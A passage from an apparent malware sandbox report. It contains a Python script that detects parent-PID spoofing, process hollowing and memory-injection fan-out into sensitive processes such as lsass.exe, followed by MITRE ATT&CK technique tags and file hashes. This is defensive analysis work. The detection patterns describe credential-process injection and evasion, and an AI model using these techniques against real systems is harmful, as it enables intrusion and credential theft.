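thread context, who wrote into whom); their shape is this example's own, and
the event lists are constructed from the PIDs in the process tree above.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Create:
    creator: int   # process that called NtCreateUserProcess
    parent: int    # parent PID recorded on the new process (attacker-chosen when spoofed)
    child: int


@dataclass(frozen=True)
class Write:       # WriteProcessMemory, src -> dst
    src: int
    dst: int


@dataclass(frozen=True)
class SetCtx:      # SetThreadContext, src -> dst
    src: int
    dst: int


SENSITIVE = {"lsass.exe", "winlogon.exe"}   # targets worth an immediate escalation (assumption)
FANOUT_MIN = 3                              # distinct foreign targets before we call it fan-out (assumption)


def analyse(names: dict, creates: list, writes: list, ctxs: list) -> dict:
    """names maps pid -> image basename. Returns three kinds of finding."""
    ctx_pairs = {(c.src, c.dst) for c in ctxs}
    write_pairs = {(w.src, w.dst) for w in writes}
    own_children = {(c.creator, c.child) for c in creates}

    # 1. Parent PID spoofing: the recorded parent is not the caller.
    spoofed = sorted((c.creator, c.parent, c.child) for c in creates if c.creator != c.parent)

    # 2. Hollowing: the creator wrote into its own fresh child and redirected a thread in it.
    hollowed = sorted((c.creator, c.child, names.get(c.child, "?")) for c in creates
                      if (c.creator, c.child) in ctx_pairs and (c.creator, c.child) in write_pairs)

    # 3. Fan-out: writes into processes the writer did not create.
    fan = defaultdict(set)
    for w in writes:
        if (w.src, w.dst) not in own_children:
            fan[w.src].add(w.dst)
    fanout = {src: {"targets": sorted(dsts),
                    "sensitive": sorted(d for d in dsts if names.get(d, "").lower() in SENSITIVE)}
              for src, dsts in fan.items() if len(dsts) >= FANOUT_MIN}
    return {"ppid_spoofing": spoofed, "hollowing": hollowed, "injection_fanout": fanout}


# Constructed from the report: PIDs and relationships as recorded, foreign write targets abridged.
NAMES = {3384: "Explorer.EXE", 3532: "weave.exe", 3372: "cli_gui.exe", 2316: "updater.exe",
         2344: "powershell.exe", 3008: "cmd.exe", 1068: "cmd.exe", 2352: "dialer.exe",
         1164: "powershell.exe", 2104: "schtasks.exe", 636: "winlogon.exe", 684: "lsass.exe",
         428: "dwm.exe", 988: "svchost.exe", 1152: "svchost.exe", 1428: "svchost.exe"}
CREATES = ([Create(3384, 3384, 3532), Create(3532, 3532, 3372), Create(3532, 3532, 2316)]
           + [Create(2316, 3384, pid) for pid in (2344, 3008, 1068, 2352, 1164, 2104)])
WRITES = ([Write(3532, 3372), Write(3532, 2316), Write(2316, 2352)]
          + [Write(2352, pid) for pid in (636, 684, 988, 428, 1152, 1428)])
CTXS = [SetCtx(2316, 2352)]

if __name__ == "__main__":
    for kind, value in analyse(NAMES, CREATES, WRITES, CTXS).items():
        print(kind, value)
```

The creator field is the part most telemetry lacks: Sysmon event 1 and Security event 4688 record the parent the new process was given, which is the spoofed value. The caller can be recovered by comparing the process that emitted the Microsoft-Windows-Kernel-Process ProcessStart ETW event with the ParentProcessID that event carries, or from an EDR that logs the creating thread. Without it, the hollowing and fan-out findings still work on WriteProcessMemory and SetThreadContext telemetry alone.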
Network
MITRE ATT&CK Enterprise v15
Execution
    Command and Scripting Interpreter (1)
        PowerShell (1)
    System Services (1)
        Service Execution (1)
Defense Evasion
    Impair Defenses (1)
    Indicator Removal (1)
        Clear Windows Event Logs (1)
    Virtualization/Sandbox Evasion (1)
Downloads
Files written during the run (size and hashes as recorded):

Filesize: 2KB
MD5: 627073ee3ca9676911bee35548eff2b8
SHA1: 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Filesize: 944B
MD5: 2e8eb51096d6f6781456fef7df731d97
SHA1: ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256: 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512: 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Filesize: 944B
MD5: 8cb7f4b4ab204cacd1af6b29c2a2042c
SHA1: 244540c38e33eac05826d54282a0bfa60340d6a1
SHA256: 4994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6
SHA512: 7651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e

Filesize: 944B
MD5: 80707036df540b6657f9d443b449e3c3
SHA1: b3e7d5d97274942164bf93c8c4b8a9b68713f46f
SHA256: 6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0
SHA512: 65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 2.9MB
MD5: 8f21c4390128917bf5af5c2ee3fbc592
SHA1: 733cc166b3161772755edf69314003a4a5e87953
SHA256: 78b628830cd84013ba1bdab6c5f4a1529f828119157a77d212d86e82f35a817b
SHA512: c5116b27a4f722168c934319cd804a0390490be8341f27d39337877ce1c14e72c3dcdf725b982961c14de0a3da96362f2a9d4f4c486b7658c87c4801155cb015

Filesize: 5.7MB
MD5: 8cd62e3ece85c4c3e9f6f7c816256adf
SHA1: 9712769be3f755c5ecbe68d38800a3a8ecdaf324
SHA256: 39ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b
SHA512: a0aa9f0e6542c526fc18d48ab945d8be3245900381c9640f6e122a633a15dd9a9364bacd830fbc588a926ebef8240300c1fbf4211eae600cff8b7e2c63613501